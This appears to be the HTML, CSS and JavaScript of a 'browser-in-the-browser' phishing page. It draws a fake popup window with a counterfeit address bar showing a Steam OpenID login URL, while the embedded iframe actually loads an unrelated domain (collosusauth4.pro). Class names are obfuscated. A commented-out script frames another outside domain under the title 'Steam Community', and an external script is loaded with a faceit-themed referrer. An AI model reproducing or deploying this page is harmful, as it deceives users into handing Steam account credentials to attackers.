<div class="xoqdntucvjtlfvuefpgekhuotntgzblk oolgqyjeqjkgccjokjzhrdvtertdoclr"></div>
<div class="xoqdntucvjtlfvuefpgekhuotntgzblk utypozlkrajojbtdqduajsduucbkfcko"></div>
</div>
</div>
<div class="kwxdwdxxutypshfaumjlpfqylgqcvcqm">
<div class="fnqzcnkvultxihurrabvdtgcobpfhtyc"></div>
<div class="iivbnbuqjkvnbltgxnrcbvfamxhguakp">
<input type="text" value="https://steamcommunity.com/openid/login?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fidbamhsg.ef%2F&openid.realm=https%3A%2F%2Fhjwvmimk.pn&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select">
</div>
</div>
</div>
<iframe frameborder="0" width="100%" height="100%" src="https://collosusauth4.pro/11c89d17a" style="height: calc(100% - 60px)"></iframe>
</div>
</div>
<style>
.nvsyyjaxnlfxvdfpdgqqquguyprhbnmf {
/*max-width: 1050px;
max-height: 670px;*/
width: 60%;
height: calc(100% - 187px);
position: fixed;
top: 50px;
left: 100px;
z-index: 100000000;
font-family: Segoe UI !important;
background-color: rgba(255, 255, 255, 1);
}
.vgcpybocpwnskljukuwmyvpqhrzzndqv {
position: relative;
width: 100%;
height: 33px;
line-height: 31px;
cursor: default;
user-select: none;
font-family: Segoe UI !important;
}
.swdwildflcokqggdivwssjcbwdljiivg {
width: 17px;
height: 17px;
margin: 8px 6px 0 8px;
float: left;
background-size: contain;
background-image: url(data:image/png;base64,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);
}
.zakvqfaboxpvejekrcewidzmjcfbgbvk {
line-height: 31px;
font-size: 13px;
font-family: Segoe UI !important;
color: #000;
float: left;
font-weight: 400;
}
.xcyfucntdesimijjbkvvebnkmwkhynru {
position: absolute;
top: 0;
right: 0;
height: 33px;
}
.xoqdntucvjtlfvuefpgekhuotntgzblk {
display: inline-block;
width: 46px;
height: 30px;
position: relative;
background-color: rgba(0, 0, 0, 0);
}
.xoqdntucvjtlfvuefpgekhuotntgzblk:hover {
background-color: rgba(0, 0, 0, 0.2);
}
.cotuvuxjltknjjkudkftosxhmhjehfwu:after {
content: "";
width: 10px;
height: 1px;
position: absolute;
top: calc(50% - 1px);
left: calc(50% - 5px);
background-color: #000;
}
.oolgqyjeqjkgccjokjzhrdvtertdoclr:after {
content: "";
width: 8px;
height: 8px;
position: absolute;
top: calc(50% - 6px);
left: calc(50% - 4px);
border: 1px solid #000;
}
.pvdffsqptqzyfxztclkgmuugzzkeslmi:after {
content: "";
width: 8px;
height: 8px;
position: absolute;
top: calc(50% - 4px);
left: calc(50% - 5px);
border: 1px solid #000;
background-color: #fff;
}
.pvdffsqptqzyfxztclkgmuugzzkeslmi:hover:after {
background-color: #cccccc;
}
.pvdffsqptqzyfxztclkgmuugzzkeslmi:before {
content: "";
width: 8px;
height: 8px;
position: absolute;
top: calc(50% - 7px);
left: calc(50% - 2px);
border: 1px solid #000;
}
.utypozlkrajojbtdqduajsduucbkfcko:hover {
background-color: #ff0000;
}
.utypozlkrajojbtdqduajsduucbkfcko:after {
content: "";
width: 1px;
height: 12px;
position: absolute;
top: calc(50% - 6px);
left: calc(50% - 1px);
background-color: #000;
transform: rotate(45deg);
}
.utypozlkrajojbtdqduajsduucbkfcko:before {
content: "";
width: 1px;
height: 12px;
position: absolute;
top: calc(50% - 6px);
left: calc(50% - 1px);
background-color: #000;
transform: rotate(-45deg);
}
.utypozlkrajojbtdqduajsduucbkfcko:hover:after {
background-color: #fff;
}
.utypozlkrajojbtdqduajsduucbkfcko:hover:before {
background-color: #fff;
}
.kwxdwdxxutypshfaumjlpfqylgqcvcqm {
width: 100%;
height: 27px;
position: relative;
box-shadow: 0px 0px 0px 1px rgba(0, 0, 0, 0.3);
overflow: hidden;
}
.fnqzcnkvultxihurrabvdtgcobpfhtyc {
position: absolute;
top: 0;
left: 0;
width: 135px;
height: 27px;
margin-right: 8px;
cursor: pointer;
transition: 0.2s;
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAI8AAAAaCAYAAACOyA9jAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAATiSURBVGhD7ZpBaBtHFIb/9mywDwHpECKofHEoWJDItAdB4gSTg0x6ENSmgupQqkuDTAXpUdWhPUWtRWiJoFAVjG2ILsELdUWIDaaHWjGVacE9yAW5AUslB7uo0J6UebOj3dXuyqtdViqF+cygGY12NNr5539vZL3WZUAi8cDr4lEicY0Uj8QzUjwSz0jxSDwjxSOxZWNjQ9QGI8Uj8cxQ4jn7p4NPfvgaV4vv8UJ1iWQo8Xy++x0OTxv4/v0CL1S/v/2V6HVmv3wbS0pLtIy0UFm9jUJdNAdyiEL+Hip2Q/gAzW8ibyjlQ9EzfrS5rG6hzdpt5Z79fOqr2mtU6B4ZPkN+Ffv0NL1OPOd8n93QGk48a/UqSu/cR2gqyAvVt377UfQ6MxeJQznYVD+MkVYNlfM4YhHRHjvqDZ9HAZ3cU608w451rmMkfm0NnZVFBETbkdYWlvLfIJTWP0PnbhgntNkiK6y9hvKk+lI/GUo8f/37NxdND6r/cf6naA1B5CbyULBnUn77eRVK6CbmRHu8kOtlUaOFSs2K51TmUiv/0Zw80jqGMrmAmL5E7J4vImFsjwBH8bz16EP+qNuhWoi3S2n+6MwsYiEgVzfabwt7jSPkI/rCcYs2vIetzVrsmtH3nBoKtXEGhSDheh/Hne7wgHDAEWFXoZ3P+vgceiHWeN3oQi4nGEb8vIq9Ub6HDY7i+bX9u6hZ+YUpflgodKFpCAf1TaT6QhYT08sFHAvbPb42g9yuSSQEuVjfjWILuKsgf4NsnhYzico0cxM+DrPrs6y9CPluDYNp+gJIAMKdtHkdY94k3lwDKFK/FmqOkCrtICauoRCSKhlF5zPBRWzy9+gJeDwMFbZ8wRS69usKi+1LhvAQRCKlx/nA9QW2m47RFG0dcrEjVJ4L9RjzJoubsDFvxE2O54L6DnKTGRQN7hSIf2ASL4RwjcygnDaEvsgSyzmsYdtXeG7DxD1dRZi5nf0BxV/GJx626ElyE76Qh9hrziBx3RQyDCeDiVKRSc2euTsZoFHjO4zyJvRESG7C/uZ7Y1B5wkY5O7HuRm71duLUab9gzjp1xSSMAEKTR2i6WpsgrkyJqp9Y5kbifshEVED0IOnz6crKGMUj3IRCF9/RpgSPhLMb1sJWJ50BC3T2BKNIgHY/5U3QRUiCYE6hjdErdicXGsPBDQKXw/bCY84SMun+Ylo4ORNVlwyaAxf2QNQcs/ZitO4zVvH0FmyeuUF8Otq3oOZdzk9iom4liNg0UNneRAUGEXJRFZEZyrJFSHtitfj9sshPeH7VP15b+Qwp43vawnKebT1UqtdkkOShlZJrFwm0zRxojMwBUL4jDhts4/W7DDk7EL3sSuGucRTPm4E3RM3KRX320KLPsEdryOK5RDOrhZvMS+Yios8OcjE0FUT78g0miBXVsrWwxcpA++Z5gvX1X1zq5WKzyJr6ww2W1Dt+B8Nynks7+jUHYTxz871NH9Y5TJSqSKQf6kdx5rg1tgm0fpbk4+5TZEf9/Rn9klDiJ/Xug08/6j4+FU2X/PTtre67Wx4vHshp9/GXt7oPfhbNIVhfXxe1wYw3bEmGQiGX8evIzQ8hSaTORdtH5G+YfYe+G6J/FRjCyv8Q+knG8vKyaNkjxSPxjAxbEs9I8Ug8I8Uj8YwUj8QjwCv0PVkGDdNdzQAAAABJRU5ErkJggg==);
}
.fnqzcnkvultxihurrabvdtgcobpfhtyc:hover {
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAI8AAAAaCAYAAACOyA9jAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAUZSURBVGhD7ZtPSBxXHMe/asGD6CHsQsiCCpWCi38uFczBJoxY8BAIjVBQL9pAb4kepFAhSEAoeIgbSHuxemgUCrYUPOxBHCIetNiLf1hpsWACa4O77UFrsAdJf783b3ffzs5kZsy4Le37hGHfm5l982be931/vzdmK14T0GguQMXZ2dnr09NTnJ+fy12a/zNVVVWoqalBdXW13ONOpRaORoW1wJrwQ6UWjsaOX01Uyk+NJjBaPJoLo8WjuTAVR0dHnkv1479e4asfv8fKrz+Jeve77+OzDwZFWfPfJBqNypI7vpzny43vsHd0gLk742Lj8her38ij3mwtDuKemZE1lQySs4OYScmqK3uYSUwg6dRECHD/WhLKtrgnj5SffF9mV5CletaccO5PajZ/jgU/I+UeErPY4t18ntzn/ZyD4Us8P+ytYfLDTxGri4qNyzkX8kN73IC5s2TdjEpmG8kTAx1xWS871gMfwDh27z/Nb/NYL+1rGTFaH2F3uBsRWfcks4J7iW8R6y/cw25PAw55ssWHqf4IU7XWqWHiSzx/Uthi0eTg8m8nv8uaD+LXMQITmzblZ3fWYMauo13Wywu73iS2eaD6muU+i/a+4X+oTxck8xxmbRc61EgT70avd+R5KzzF89H85+KzYIfWxtxZGBef3jSjIwZMp1T7zWDzYB8j8cLACYtWruFosyV2TRTts0Jhvh23ECRd7xPD6wm7hAOBDLsmz3w6JvqQC7Hq9y4v5AqiDTBO1rB5mddwwFM8v2RfyFIpP5Pi/cKhC2klHKSWMFYUskhMf3ThmbTdZ61NmN6wiYRhFyt6UDSAGyZGOtnmeTBHkWwkNxHtkF0fTzqLUMzWBpCm3wALQLpTvl8vMGAT7/QB8ICP50PNPsYW1tEhv7PbU091VXQhE+3GY3GNnIDLg6+wFQq20LWVMim231LCQxS9fYU4H2ntotn0HGlZL8Auto/kjlSPmjeVuAm12WnYHC8AqXVM1w7hgeJOEeNjm3ghhavShKl+JfTFb1HOURq2Q0XkNiTuxjXcJLdzXqCES/nEQ4N+m91EDOQeNtNN6G21hQxlZdCyMEdSc6b9xhBwsC1mGOdNyImQ3YT+DeTDBW3L1MrxYelsFFbvJM4C2ZfkunXXbMKIIFa7j3SgsYniWp0shklJ31jcEySicbTtjIa+urJTRvFIN+HQJWa0LcFj4Ww05MPWbv8QKNA5E21DL3j2c96EgghZEOQU+TZym9PKhdvwcIPI1Xpn4ZGzxGy6fzMZHB7LYkDc+iCE7YqVY26/vFz3Kat4cgM2QG5gNLYVDah9louVmCyXEkVHI5BcXUISigiFqObw0Jdly5C2XGrxW4syPxH5VXF7WfMJxtRrOkI5z2ohVFrfGcJtEVo5uQ6QQDv0gdt4uANM3ZCLDZp4xS7Dzg60XQ2k8MC8Iz9deS9S75o087Fg8KA3AXTj9pAlcglKTlsSVt2IGe7OQ7CLgUJbW89TRYQkiOFxpBOjaKFr5Bihc+46vUviPIEGZ8Z2Pr9neSxKzbhLIaDoODub5zsYynmurNO9TMq6gfn7Xt9xw6EPIqeaKCzFyXG3OVlelnXC9Z5DxNefJzRB4BUav7BTBjcA/Ib56yskXs9XCEGwVqHpTv+CCu3PE5ryYlKyG9qSWyxCRjF2Iushop0ndN7Oef4t+HEeLR6NIzpsaS6VSv7f8hqNil9NVPLPLLSANDlyP73xg/7Rn+aCAH8DTwNX1qhXYCUAAAAASUVORK5CYII=);
}
.kwxdwdxxutypshfaumjlpfqylgqcvcqm input {
box-sizing: content-box;
position: absolute;
top: 0;
right: 0;
width: calc(100% - 153px);
margin: 0;
padding: 0 10px 0 0;
border: none;
outline: none;
font-size: 14px;
font-family: Segoe UI !important;
font-weight: 400;
line-height: 27px;
color: #000;
background-color: #fff;
}
</style>
//
<script>
// document.querySelector('#createVerify').onclick = function() {
// var wind = window.open("", "", "STATUS=NO, TOOLBAR=NO, LOCATION=0, DIRECTORIES=0, RESISABLE=NO, SCROLLBARS=YES, TOP=50, LEFT=50, WIDTH=1004, HEIGHT=800");
// wind.document.write("<html style='overflow:hidden;'><head><title>Steam Community</title><style>html, body {width:1004px; height:800px; margin:0px; padding:0px;}</style></head><body><iframe src='https://colpanteam.online/00226' border='0' style='width:100vw; height:100vh; border: none;'></iframe></body></html>");
// window.addEventListener('message', function(e) {
// if (typeof e.data === 'object' && typeof e.data.r === 'string' && e.data.r.length > 0) {
// window.location.href = e.data.r;
// }
// }, false);
// return false;
// }
//
</script>
<script>
var mousePosition;
var offset = [0, 0];
var isDown = false;
let searchBar = document.querySelector(
".vgcpybocpwnskljukuwmyvpqhrzzndqv"
);
let iframeWindow = document.querySelector("#iframe_window")
searchBar.addEventListener(
"mousedown",
function (e) {
isDown = true;
offset = [iframeWindow.offsetLeft - e.clientX, iframeWindow.offsetTop - e.clientY];
},
true
);
document.addEventListener(
"mouseup",
function () {
isDown = false;
},
true
);
document.addEventListener(
"mousemove",
function (event) {
event.preventDefault();
if (isDown) {
mousePosition = {
x: event.clientX,
y: event.clientY,
};
iframeWindow.style.left = mousePosition.x + offset[0] + "px";
iframeWindow.style.top = mousePosition.y + offset[1] + "px";
}
},
true
);
document.querySelector(".cotuvuxjltknjjkudkftosxhmhjehfwu").addEventListener("click", (e) => {
$('#iframe_window').hide()
$("#createVerify").attr('disabled', false);
})
document.querySelector(".oolgqyjeqjkgccjokjzhrdvtertdoclr").addEventListener("click", (e) => {
iframeWindow.style.left = "0px";
iframeWindow.style.top = "0px";
iframeWindow.style.width = "100%";
iframeWindow.style.height = "100%";
})
document.querySelector(".utypozlkrajojbtdqduajsduucbkfcko").addEventListener("click", (e) => {
$('#iframe_window').hide()
$("#createVerify").attr('disabled', false);
})
</script>
<script src="js/main.js"></script>
<script src="js/calc.js"></script>
<script src="https://userstat.net/get/script.js?referrer=https://faceit.celebrityleagueopenauth.com/"></script></body></html>